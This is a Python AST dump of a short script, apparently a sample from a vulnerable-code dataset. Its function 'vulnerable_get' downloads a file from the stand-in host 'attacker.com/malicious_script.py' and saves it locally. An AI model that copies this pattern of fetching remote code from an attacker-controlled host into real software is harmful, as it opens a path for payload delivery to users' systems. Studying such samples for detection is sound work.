Module(
    body=[
        Import(
            names=[
                alias(name='requests')]),
        FunctionDef(
            name='vulnerable_get',
            args=arguments(
                posonlyargs=[],
                args=[
                    arg(arg='url')],
                kwonlyargs=[],
                kw_defaults=[],
                defaults=[]),
            body=[
                Assign(
                    targets=[
                        Name(id='response', ctx=Store())],
                    value=Call(
                        func=Attribute(
                            value=Name(id='requests', ctx=Load()),
                            attr='get',
                            ctx=Load()),
                        args=[
                            Name(id='url', ctx=Load())],
                        keywords=[])),
                Return(
                    value=Attribute(
                        value=Name(id='response', ctx=Load()),
                        attr='text',
                        ctx=Load()))],
            decorator_list=[]),
        Assign(
            targets=[
                Name(id='content', ctx=Store())],
            value=Call(
                func=Name(id='vulnerable_get', ctx=Load()),
                args=[
                    Constant(value='http://attacker.com/malicious_script.py')],
                keywords=[])),
        With(
            items=[
                withitem(
                    context_expr=Call(
                        func=Name(id='open', ctx=Load()),
                        args=[
                            Constant(value='malicious_script.py'),
                            Constant(value='w')],
                        keywords=[]),
                    optional_vars=Name(id='f', ctx=Store()))],
            body=[
                Expr(
                    value=Call(
                        func=Attribute(
                            value=Name(id='f', ctx=Load()),
                            attr='write',
                            ctx=Load()),
                        args=[
                            Name(id='content', ctx=Load())],
                        keywords=[]))])],
    type_ignores=[])